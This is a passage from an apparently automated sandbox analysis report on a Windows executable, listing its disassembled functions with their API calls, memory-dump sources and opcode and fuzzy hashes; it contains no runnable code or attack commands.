                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$Select$BeginCreateDeletePath
                                                                                                • String ID:
                                                                                                • API String ID: 2338827641-0
                                                                                                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                • String ID:
                                                                                                • API String ID: 2875609808-0
                                                                                                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3741023627-0
                                                                                                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                • String ID:
                                                                                                • API String ID: 4023252218-0
                                                                                                • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1489400265-0
                                                                                                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                • DestroyWindow.USER32(?), ref: 00455728
                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                • String ID:
                                                                                                • API String ID: 1042038666-0
                                                                                                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 0041780F
                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                • __getptd.LIBCMT ref: 00417826
                                                                                                • __amsg_exit.LIBCMT ref: 00417834
                                                                                                • __lock.LIBCMT ref: 00417844
                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                • String ID:
                                                                                                • API String ID: 938513278-0
                                                                                                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 2403457894-0
                                                                                                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                • __freefls@4.LIBCMT ref: 00415209
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                • String ID:
                                                                                                • API String ID: 4247068974-0
                                                                                                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: )$U$\
                                                                                                • API String ID: 0-3705770531
                                                                                                • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                • String ID: .lnk
                                                                                                • API String ID: 886957087-24824748
                                                                                                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \
                                                                                                • API String ID: 4104443479-2967466578
                                                                                                • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \
                                                                                                • API String ID: 4104443479-2967466578
                                                                                                • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: \
                                                                                                • API String ID: 4104443479-2967466578
                                                                                                • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                Memory Dump Source
